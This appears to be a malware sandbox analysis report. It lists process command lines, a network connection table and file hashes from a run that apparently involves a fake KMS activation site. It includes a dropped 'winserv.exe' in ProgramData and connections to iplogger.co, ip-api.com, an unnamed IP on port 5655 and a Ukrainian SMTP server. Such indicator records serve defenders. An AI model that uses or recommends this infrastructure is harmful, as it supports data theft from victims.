"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4816,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4868 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=604,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4768 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5792,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5448 /prefetch:8
C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
C:\Windows\SysWOW64\unsecapp.exe
"C:\Windows\SysWOW64\unsecapp.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4052,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4124 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | kms-auto.site | udp |
| US | 8.8.8.8:53 | kms-auto.site | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 150.171.28.11:80 | edge.microsoft.com | tcp |
| US | 172.67.212.241:443 | kms-auto.site | tcp |
| US | 172.67.212.241:443 | kms-auto.site | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 13.107.246.64:443 | api.edgeoffer.microsoft.com | tcp |
| GB | 2.18.66.73:443 | copilot.microsoft.com | tcp |
| US | 172.67.212.241:443 | kms-auto.site | tcp |
| US | 13.107.246.64:443 | api.edgeoffer.microsoft.com | tcp |
| GB | 2.18.66.73:443 | copilot.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 172.67.212.241:443 | kms-auto.site | udp |
| US | 172.67.212.241:443 | kms-auto.site | tcp |
| US | 8.8.8.8:53 | cdn.gtranslate.net | udp |
| US | 8.8.8.8:53 | cdn.gtranslate.net | udp |
| US | 8.8.8.8:53 | mc.yandex.ru | udp |
| US | 8.8.8.8:53 | mc.yandex.ru | udp |
| US | 104.26.13.42:443 | cdn.gtranslate.net | tcp |
| RU | 77.88.21.119:443 | mc.yandex.ru | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | mc.yandex.com | udp |
| US | 8.8.8.8:53 | mc.yandex.com | udp |
| US | 8.8.8.8:53 | mc.yandex.com | udp |
| US | 8.8.8.8:53 | mc.yandex.com | udp |
| RU | 87.250.250.119:443 | mc.yandex.com | tcp |
| RU | 87.250.250.119:443 | mc.yandex.com | tcp |
| RU | 87.250.250.119:443 | mc.yandex.com | tcp |
| RU | 77.88.21.119:443 | mc.yandex.com | tcp |
| US | 172.67.212.241:443 | kms-auto.site | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| NL | 108.177.119.94:443 | update.googleapis.com | tcp |
| GB | 2.18.66.168:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 2.18.66.168:443 | www.bing.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| RU | 87.250.251.119:443 | mc.yandex.com | tcp |
| RU | 87.250.251.119:443 | mc.yandex.com | tcp |
| US | 8.8.8.8:53 | b-wpi.ru | udp |
| US | 8.8.8.8:53 | b-wpi.ru | udp |
| NL | 46.21.250.137:443 | b-wpi.ru | tcp |
| NL | 46.21.250.137:443 | b-wpi.ru | tcp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 13.107.246.64:443 | static.edge.microsoftapp.net | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-mobile-static.azureedge.net | tcp |
| US | 172.67.212.241:443 | kms-auto.site | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| IT | 91.80.49.86:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| GB | 104.86.110.120:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| NL | 173.194.69.94:80 | c.pki.goog | tcp |
| US | 172.67.212.241:443 | kms-auto.site | udp |
| GB | 104.86.110.120:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| US | 172.67.212.241:443 | kms-auto.site | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 172.67.212.241:443 | kms-auto.site | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| GB | 2.18.66.171:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | checkappexec.microsoft.com | udp |
| GB | 13.87.96.169:443 | checkappexec.microsoft.com | tcp |
| IT | 91.80.49.86:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| IT | 91.80.49.86:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| GB | 2.18.66.57:443 | copilot.microsoft.com | tcp |
| US | 8.8.8.8:53 | studiostaticassetsprod.azureedge.net | udp |
| US | 8.8.8.8:53 | studiostaticassetsprod.azureedge.net | udp |
| US | 13.107.246.64:443 | studiostaticassetsprod.azureedge.net | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| GB | 104.86.110.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | ntp.msn.com | udp |
| US | 8.8.8.8:53 | ntp.msn.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 13.107.246.64:443 | api.edgeoffer.microsoft.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| US | 8.8.8.8:53 | img-s-msn-com.akamaized.net | udp |
| US | 8.8.8.8:53 | img-s-msn-com.akamaized.net | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 2.18.190.182:443 | assets.msn.com | tcp |
| GB | 2.18.190.182:443 | assets.msn.com | tcp |
| GB | 2.18.190.182:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | c.msn.com | udp |
| US | 8.8.8.8:53 | c.msn.com | udp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| GB | 2.18.66.169:443 | www.bing.com | tcp |
| GB | 2.18.190.182:443 | assets.msn.com | tcp |
| IE | 13.74.129.1:443 | c.msn.com | tcp |
| US | 150.171.28.10:443 | c.bing.com | tcp |
| GB | 104.86.110.96:443 | www.bing.com | tcp |
| FR | 52.222.169.76:443 | sb.scorecardresearch.com | tcp |
| GB | 2.19.252.151:443 | img-s-msn-com.akamaized.net | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| GB | 2.18.190.182:443 | assets.msn.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| GB | 2.18.190.182:443 | assets.msn.com | udp |
| GB | 2.18.190.182:443 | assets.msn.com | udp |
| US | 8.8.8.8:53 | srtb.msn.com | udp |
| US | 8.8.8.8:53 | srtb.msn.com | udp |
| GB | 2.19.252.151:443 | img-s-msn-com.akamaized.net | tcp |
| GB | 2.19.252.151:443 | img-s-msn-com.akamaized.net | tcp |
| GB | 2.19.252.151:443 | img-s-msn-com.akamaized.net | tcp |
| GB | 2.19.252.151:443 | img-s-msn-com.akamaized.net | udp |
| GB | 104.86.110.96:443 | www.bing.com | tcp |
| GB | 104.86.110.96:443 | www.bing.com | udp |
| GB | 2.19.252.151:443 | img-s-msn-com.akamaized.net | udp |
| US | 8.8.8.8:53 | idserver.xyz | udp |
| US | 104.21.48.1:80 | idserver.xyz | tcp |
| US | 8.8.8.8:53 | iplogger.co | udp |
| US | 172.67.167.249:443 | iplogger.co | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| NL | 173.194.69.94:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| NL | 173.194.69.94:80 | o.pki.goog | tcp |
| CZ | 91.184.249.83:5655 | tcp | |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | freemail.freehost.com.ua | udp |
| UA | 194.0.200.251:465 | freemail.freehost.com.ua | tcp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 13.107.246.64:443 | static.edge.microsoftapp.net | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| IT | 91.80.49.21:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
Files
\??\pipe\crashpad_1188_MFJLFUJCFASNXRBA
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 845d842365a2b1d6fc543d5987a8444c |
| SHA1 | d9e74493c371fda8850da9a0daa8bc4f77ec0326 |
| SHA256 | 6f55c946ac04a6258c714365d9a2cd4ac841e695f3be9f04e84310e5d9ab6110 |
| SHA512 | 3fa48469bc4e7d480b7ad5c98a8a3e4e3f210ad986b6aa4e6d8b3a2a0061b2ad7423ac673fb45a435bbdd927f623e3032039b8fbf0aaf5a9ecd98831378562d1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 38d6d1d1e45be19825fc28191b82953c |
| SHA1 | 527778930202971fddd2f32a60b25756c2d26c68 |
| SHA256 | 40f0260693f82c5c8425ede2cc137ee3d45eb0c0f0916b67d73b05a5029a49ac |
| SHA512 | ab8588a7ef927c914af3b5c63893e409e3f7de4606ab7f22806198e86085d96a480125cf8153d91a37d4a3fdc088b3256b0282ba664f8eac025d3b9b567c730b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\000\t\Paths\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
| MD5 | 30e377505ec4f100cf4426003a277efe |
| SHA1 | 5ed7705afda986f6b83977ca7d2c236b05d8764c |
| SHA256 | 3c970ea95256e66c9fddab517a2095c23a528906c30a2f1ff51b7af55081a956 |
| SHA512 | 3fac9fbf41fc5618fdcced6b71c7642afe0d8ff57a462097f76835da68e050a0f97dc9ef043d1bdc4955a6a59e025b85d4f91fd0d9af875ce6c9a68db67bac83 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 0058a8ff9cf739f9993f2c398758feff |
| SHA1 | fde4e2a03333da9860f4d5ac57ff8e93335b258a |
| SHA256 | 1e4e785eec1b08d590ddaeedaf8c4da361ffabc1eb0bb256f9dbcca08926b6b7 |
| SHA512 | eb7003a463b0eac5b853df21e9ca71699387633ac34c7fae4525bed9afc9c317f492be4378e4a0656cb6b0a2e5568e590d7d32b2a036b554d8143b77212d6a1e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log
| MD5 | 0755cb96c061ec84ef950959d37a9149 |
| SHA1 | 136b62b2dd9ef0a02c3a847128a3b960e38c6ce3 |
| SHA256 | ca79ca5814eacbb0470d01ae3d583487be8bf1ca2563a219bd48f63bc7e13104 |
| SHA512 | 8014c7b2323e3a66c54a77befbb1e4f30e8d1aa9ffee3739af6a053533eda5d5ad1ffcef2767a9958813508c1edb85633d18179a4acc886dab23e969c0982b08 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps
| MD5 | 2b66d93c82a06797cdfd9df96a09e74a |
| SHA1 | 5f7eb526ee8a0c519b5d86c845fea8afd15b0c28 |
| SHA256 | d4c064db769b3c109da2ed80a53fbab00987c17421a47921e41e213781d67954 |
| SHA512 | 95e45c0aea0e704be5f512dffaae377d4abef78da99b3bca769264d69be20f2570daf2f47905645217e1b2696e42b101f26149219f148b4d6dd97a6c2868b6f5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 3367d719ea1f750b9030144de5f41e49 |
| SHA1 | adf3197401953d4bf4db9a471428812b96478458 |
| SHA256 | d29c0f65005e4cce382796cd1506465a517d11558606844f2da0cc14d8a8671e |
| SHA512 | 8356fea9806736e3231dc8728d758ff50c297301ef634f1b7f310d7e5e5ad3dce44603d947da3eed0f5ffaf9eb58ca2300e809c4813e2609bb8a2e8e5bc823c8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | f61ff8a76b902d38a7f0b0b913df0809 |
| SHA1 | 3cd1d1acdf341bca7108188294fbf122df6b1f0a |
| SHA256 | 5ea52ac89c0d5e53f851389db64c2fea3db91ea0a8b8b8a4799e851446567a3e |
| SHA512 | 295cda06641fbaaf0a607cf1b4a420cc0a1778d9a072b75dfd800969a84341cb2a60098c093d373e5e5da45c3ba20db9d2bbecacebdedb46cf5bc66a6ec67467 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
| MD5 | 20d4b8fa017a12a108c87f540836e250 |
| SHA1 | 1ac617fac131262b6d3ce1f52f5907e31d5f6f00 |
| SHA256 | 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d |
| SHA512 | 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 291c5883fa312e5add47f78d2d4d06d6 |
| SHA1 | f8b3f68bc58282007462ec874af28c702a147fe7 |
| SHA256 | 6f5a78bcca18b244c3db221aa97fe823d01236373d38ce60f47de1197592510e |
| SHA512 | 1be924a839c6bfd469ea7da8a1abc860c2394672da8becdbcf419bd928547842cab73116bdd5fc4d5d8e6c0fdfedcd9f2b61d874046c1e7823bfc464e5f970f0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 92be2585d4e607ebcad11ab954198acf |
| SHA1 | 17a3c5570de98a22f956bb59f2e51d8141681f52 |
| SHA256 | 0c6e08ac5572212150d8d90fc3d9260df9c448cc41c9f290cd0662925a1eee33 |
| SHA512 | c47fd34290f11fa4734d34c0eed46c9cfae579ef6ad711f8317a4733aadf71134653119f254d073d639b7f0fe6fedeb1e31029ffe6eaddae9df2fbb8bfdb1d31 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe57a4fa.TMP
| MD5 | f59dce7143f42cfa8734cac4acee8397 |
| SHA1 | f1df959104321916633ab92992d5adfdaf8564b9 |
| SHA256 | 70b33699e0b01d82eeebbe1dddbdd4f0a34d55e1ef05329144b0f5b1ba1a9263 |
| SHA512 | 9a9aefc98ee82862a5cd103acaeea4b05c58faa21755c2824b1f8782f5430546f35b1defa39e07edaec63daac7bd1507cefb1b07c62c4895c752d38712e8ecfc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 6de2d1d4a0ca2a9d2b79aad17e94ab87 |
| SHA1 | b05cc14a8c73c6ca04c10bcabf5ae8e39ebddae8 |
| SHA256 | 9c04a0ade86b9962bb95826086cdb7a67c5ff61a856bf9593168f893619a8587 |
| SHA512 | 4f5ffde174fb092ad519d352928f3315496f09b422e293eefbf1b1da2b42aec7c7b2c2e0afd31e235aba0c301596219926b1993bbf1ef78f0edfa4ca7447ad61 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
| MD5 | 7447417dbafbe1dd05d99e847ae51258 |
| SHA1 | b290b29b5afa9993956a1abe736669d28ba42257 |
| SHA256 | 23069a5c811489e9b3a61e3cb605008fdd1c26e2e9eb261d997bd337805bd710 |
| SHA512 | 7c2cf2fa0bf1417f19c0ca8abcf3e9f0f62eda4793d1d059e34f4d900b95da82e7c0dafc0334d4c1073a66cf55640ddf01195616be881fff9769ca5b881bc273 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
| MD5 | c421ffcc5977177154f534ba8a5029ae |
| SHA1 | 3fdfd5a19d55e39259feae14606fffab4c76efee |
| SHA256 | 71e6c0cd425df7ff29c8d1e142ab121a168bfaf85499d037cc4069fa7133515c |
| SHA512 | b50c49280c40b59dbac2b1512f10b745b4df5b32492a9d2202f90a221e433bc78fa0a2894e495e01108d048ea0252570d9f3f0f9793b30daa27d1e2e5404aa5f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig
| MD5 | 3f8927c365639daa9b2c270898e3cf9d |
| SHA1 | c8da31c97c56671c910d28010f754319f1d90fa6 |
| SHA256 | fc80d48a732def35ab6168d8fd957a6f13f3c912d7f9baf960c17249e4a9a1f2 |
| SHA512 | d75b93f30989428883cb5e76f6125b09f565414cf45d59053527db48c6cf2ac7f54ed9e8f6a713c855cd5d89531145592ef27048cf1c0f63d7434cfb669dbd72 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
| MD5 | af5a8ccdf4b83383454d0633ac12101f |
| SHA1 | 1ed4c7962e272c576e0eb1303a192b9b411a71f9 |
| SHA256 | 582e48a3e0971bc2dc2e4fd4dcb2629c8be0865d8eae99a59968fa7c4db24671 |
| SHA512 | cf5f4cd48d17211469742ede3e92122aab8fcfeb924a0bbdf894e3a8c0f69f585c6b0d3a86f5e8e60a0e9ad9b393b8ea03b31a24a2160ead93f9e421324bed79 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 223e95a10c0d7f3ae1342198068775ac |
| SHA1 | e3bbf7cfe52627e0f2a8b4508abe437c88077f27 |
| SHA256 | 3c8d7b1c83ad8ed47e48b717c3d409cfa58ff00acb4c27e638d89068c425c83b |
| SHA512 | 623c75bc77e624220392f6df179e46e346e91e28eb8d7130194b6f015520a1246a74955a2062d3a1d12740693ae12469cb8ce8fc5e8129bbd20a49fe19849753 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 9a458cb4e791939f78f40dbd52fba323 |
| SHA1 | e41404e1e7467f75d57b8cc6562790da6198df14 |
| SHA256 | 5fba5184f68d2a5d84774067a06eae61ed8e5d6c122477d16e49e8aabe6f54b7 |
| SHA512 | 5ebe2ee700c76b19663317a0a0ca6b09b4fc2073027f4cf28b49ce6523f56d61d7465797c569c7aad60404f51a045ea4021eefbe8ed2baeb586f252f43ca4cf5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1c79390706807a17ff6a350efb6c9978 |
| SHA1 | 2dc9968898df93b74be807dae7a7a9e216c569cc |
| SHA256 | 32cfa5f6873d6e2df79c4eee1796b04cd3be9aa2dd91230598cd1063ba20b343 |
| SHA512 | 9ab33cc5402c07127489ebfb3463207bcfec76f476c942babb50e5c6c9b6ec869d52b0f13328491485d1272be1b61ee14ac1a270e9e5f271202c6490dca34ab2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | a66a4535f50c39d7832e48ca61756c12 |
| SHA1 | beb5c30e6b5c78407a11a8a4fd5f8e3ebdc36691 |
| SHA256 | 4e5ef2a514f82037bdf00b9f1a889097f9925daa9576c9ee2cc64948c7bdec9f |
| SHA512 | 00cb41dcbf5af7041372da8512088cb2877c67103100aa01a84af31395fe79e222a16718ec88e8bee50c566555483501b13636cc1f047e563aa60b198e9de9bd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old
| MD5 | 26c0c227375f191ce814124955dd64de |
| SHA1 | 05dca8f12b860f6806a2eef865492b548c1033d9 |
| SHA256 | 63e5398fecf5a8ef84840685d6ba326e748bd46b11b158b5b935d57d38bfc28d |
| SHA512 | f470e959e72bc89ce95fca5e92305043c6d3e183b858cbdfa36728bd5c9e0d9923cc82cae2d7fffb37368fa7625625664d840fdfc36c10f6b200d6ff282a8e54 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 9eac58694a7bc02a0b3f963721d6073f |
| SHA1 | 2c915fb2b3fdb079317441ed5d8d19c3ea9a5885 |
| SHA256 | 2f1e00c4befe64bbc856b966c6e6bb62ad59161d19dbd76ef005060edcd26f51 |
| SHA512 | 5cf86f9c08a4df1e46509f762c7a8bc590d813de77c98c1b50765120137941f95ebf7cdff45d7ba7fb4a37b778c014f220b441827f01a76ff2ea273080d14232 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\MANIFEST-000001
| MD5 | 586acef7f88a08bae8ff3d97a38ab316 |
| SHA1 | 427c7aa31e2d94ea9bfdfa7ae7556d7a6bbf8069 |
| SHA256 | 9bc8ad7a6eb7e126bbba452910f464c6e1dfd0a112625505bdf45ad467d4cb19 |
| SHA512 | 0c1991a5c354af153707b8ee26de76dfe3172d2be94ee5a8b1e3bebfed1d3f6ea02f02dcdd657b99f89884da925375022edc6fd977fdab0339f616cab29f9f00 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Well Known Domains\1.2.0.0\well_known_domains.dll
